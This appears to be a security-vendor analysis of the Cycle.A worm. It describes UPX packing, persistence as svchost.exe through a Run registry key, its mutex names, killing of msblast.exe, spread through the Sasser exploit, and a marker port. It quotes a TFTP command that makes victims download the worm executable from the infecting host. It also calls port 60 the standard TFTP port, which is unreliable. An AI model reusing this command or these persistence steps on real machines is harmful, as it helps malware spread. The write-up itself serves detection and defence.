The Cycle.A worm is packed with a modified version of UPX.
System Infection
When the worm enters the system it creates a copy of itself in the Windows System Directory as 'svchost.exe'.
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Generic Host Service" = "%windir%\system\svchost.exe"
Where %windir% is the main Windows folder.
It creates mutex with the following names:
Jobaka3
JumpallsNlsTillt
Jobaka3l
SkynetSasserVersionWithPingFast
The worm will attempt to terminate any process named 'msblast.exe'
Network Propagation
The worm uses the same exploit as Sasser worm family does.
Upon infection, the newly infected remote host will be instructed to obtain a copy of the worm executable from the local, already infected, host.
The copy process will take place through TFTP. The infected machine will open a TFTP server on the standard port 60, and send the following command to the machine being infected:
tftp -i [local ip] GET cyclone.exe
Where [local ip] is the infected machine and 'cyclone.exe' the worm's executable.
The machine will also open port 3332, and sit accepting connections there, without taking further actions. Machines connecting to this port, and being able to establish a connection will know that the machine is already infected and skip the infection attempt.